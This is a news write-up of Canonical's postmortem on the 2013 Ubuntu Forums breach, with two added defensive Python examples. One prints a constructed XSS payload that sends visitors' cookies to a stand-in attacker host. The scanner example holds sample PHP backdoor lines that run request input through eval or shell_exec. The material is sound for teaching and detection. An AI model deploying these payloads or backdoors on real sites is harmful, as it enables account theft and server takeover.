Canonical has published a postmortem on the recent Ubuntu Forums hack and has shared a blow-by-blow account of how the attack was carried out.
At 16:58 UTC on 14 July 2013, the attacker was able to log in to a moderator account owned by a member of the Ubuntu Community.
This moderator account had permissions to post announcements to the Forums. Announcements in vBulletin, the Forums software, may be allowed to contain unfiltered HTML and do so by default.
The attacker posted an announcement and then sent private messages to three Forum administrators (also members of the Ubuntu community) claiming that there was a server error on the announcement page and asking the Forum administrators to take a look.
One of the Forum administrators quickly looked at the announcement page, saw nothing wrong and replied to the private message from the attacker saying so. 31 seconds after the Forum administrator looked at the announcement page (and before the administrator even had time to reply to the private message), the attacker logged in as that Forum administrator.
Based on the above and conversations with the vBulletin support staff, we believe the attacker added an XSS attack in the announcement they posted which sent the cookies of any visitor to the page to the attacker.
Once the attacker gained administrator access in the Forums they were able to add a hook through the administrator control panel. Hooks in vBulletin are arbitrary PHP code which can be made to run on every page load. The attacker installed a hook allowing them to execute arbitrary PHP passed in a query string argument. They used this mechanism to explore the environment and also to upload and install two widely available PHP shell kits. The attacker used these shell kits to upload and run some custom PHP code to dump the “user” table to a file on disk which they then downloaded.
The attacker returned on 20 July to upload the defacement page.
What they do not know is how the attacker gained access to the moderator account in the first place, or which XSS payload was used, because the administrators deleted the announcement containing it before they were aware that an attack was in progress.
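To make the announcement step concrete, here is an added example in Python. It is not vBulletin's code and not the attacker's payload (which was deleted before anyone captured it): a renderer that mirrors the unfiltered-HTML default the postmortem describes, a constructed cookie-stealing payload of the kind the postmortem infers, and the two fixes a practitioner would apply, escaping the announcement body and marking the session cookie HttpOnly. The cookie name `sessionid` and the host `attacker.invalid` are placeholders.

```python
"""Added illustration of the announcement step; not vBulletin code."""
import html
import re

# Constructed stand-in for the cookie-stealing payload the postmortem infers.
# The real announcement was deleted, so this is an assumption, not evidence.
COOKIE_STEALER = (
    "<script>new Image().src='http://attacker.invalid/c?'"
    "+encodeURIComponent(document.cookie);</script>"
)

_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_announcement(body: str, allow_html: bool = True) -> str:
    """Render an announcement body the way the page describes vBulletin's
    default: allow_html=True emits the author's markup verbatim, so a moderator
    account can plant script that runs in every visitor's browser."""
    if allow_html:
        return body
    return html.escape(body, quote=True)


def script_survives(rendered: str) -> bool:
    """Tripwire for the demonstration only: does a <script> tag reach the page
    as markup? This is not a sanitizer; the fix is escaping, not blacklisting,
    since event-handler attributes (onerror, onload) also execute."""
    return _SCRIPT_TAG.search(rendered) is not None


def cookie_readable_by_script(set_cookie: str) -> bool:
    """True when a browser would expose the cookie to document.cookie.
    With HttpOnly set, the payload above would exfiltrate an empty string,
    although the XSS itself would still run inside the administrator's session."""
    attrs = {a.strip().lower() for a in set_cookie.split(";")[1:]}
    return "httponly" not in attrs


def harden(body: str, set_cookie: str) -> tuple[str, str]:
    """Apply both fixes: escape the announcement HTML and add HttpOnly (and
    Secure) to the Set-Cookie header if they are missing."""
    safe_body = render_announcement(body, allow_html=False)
    parts = [p.strip() for p in set_cookie.split(";")]
    present = {p.lower() for p in parts[1:]}
    for flag in ("HttpOnly", "Secure"):
        if flag.lower() not in present:
            parts.append(flag)
    return safe_body, "; ".join(parts)


if __name__ == "__main__":
    raw = render_announcement(COOKIE_STEALER)
    print("script reaches visitors:", script_survives(raw))
    body, cookie = harden(COOKIE_STEALER, "sessionid=0123abcd; Path=/")
    print("after hardening:", script_survives(body), cookie_readable_by_script(cookie))
```

HttpOnly only blunts the cookie theft; the injected script still executes with the administrator's session and could drive the admin control panel directly. The durable fix is to stop trusting moderator-supplied HTML at all (escape it, or restrict raw HTML to a small set of accounts), which is why the renderer's `allow_html` default is the real defect.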
They confirmed that the attacker exfiltrated the table containing usernames, email addresses, and salted and hashed passwords for all 1.82 million Forum users, but said they believe the attacker was not able to gain access to the Forums front-end servers, the Ubuntu code repository and update mechanism, or any other Canonical or Ubuntu services.
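The hook and shell-kit steps in the postmortem describe a PHP backdoor that runs whatever arrives in a query-string parameter. The scanner below is an added example in Python, not Canonical's or vBulletin's tooling: it flags that shape (an interpreter or shell sink fed directly from `$_GET`/`$_POST`/`$_REQUEST`/`$_COOKIE`) plus common shell-kit idioms, run over constructed samples. The hook bodies, the `plugin:` origins, the file path and the base64 blob are invented for illustration.

```python
"""Added example: flag hook bodies and PHP files that hand request input to an
interpreter or a shell. Not Canonical's or vBulletin's code."""
import re

REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
CODE_SINK = r"\b(?:eval|assert|create_function)\s*\("
EXEC_SINK = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("

# Each rule is (name, regex). The first is the shape of the hook the
# postmortem describes; the rest are idioms common in PHP shell kits.
RULES = [
    ("php-eval-from-request", re.compile(CODE_SINK + r"[^;]*?" + REQUEST_INPUT)),
    ("os-command-from-request", re.compile(EXEC_SINK + r"[^;]*?" + REQUEST_INPUT)),
    ("include-from-request",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*" + REQUEST_INPUT)),
    ("obfuscated-eval",
     re.compile(r"\beval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")),
]


def scan_php(source: str, origin: str) -> list[tuple[str, int, str]]:
    """Return (origin, line_number, rule_name) for every line that trips a rule.
    Scanning line by line keeps the sink-to-source match local; a sink whose
    argument is built on an earlier line needs a real PHP parser, not a regex."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((origin, lineno, name))
    return findings


# Constructed samples, not the attacker's actual hook or shell kits.
BACKDOOR_HOOK = "if (isset($_GET['x'])) { eval($_GET['x']); }"
BENIGN_HOOK = "$show['custom_banner'] = true;\n$vbulletin->options['banner'] = 1;"
SHELL_FILE = "\n".join([
    "<?php",
    "eval(gzinflate(base64_decode('c3lzdGVtKCRfR0VUWydjJ10pOw==')));",
    "if (!empty($_REQUEST['c'])) { echo shell_exec($_REQUEST['c']); }",
    "include($_GET['f']);",
])


def scan_all() -> list[tuple[str, int, str]]:
    """Run the rules over the samples. vBulletin keeps hook (plugin) code in
    its database rather than on disk, so export those bodies and scan them
    alongside every .php file under the web root."""
    return (scan_php(BACKDOOR_HOOK, "plugin:banner")
            + scan_php(BENIGN_HOOK, "plugin:theme")
            + scan_php(SHELL_FILE, "forum/images/x.php"))


if __name__ == "__main__":
    for origin, lineno, rule in scan_all():
        print(f"{origin}:{lineno}: {rule}")
```

A scan like this is a triage aid for finding what an attacker left behind, not proof of a clean system; after an administrator-level compromise the forum should be rebuilt from known-good sources and every credential that passed through it rotated, rather than cleaned in place.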
Naturally, they proceeded to clean up the mess and implement a slew of new changes that should make similar attacks much harder in the future. For more details about the changes, check out the blog post.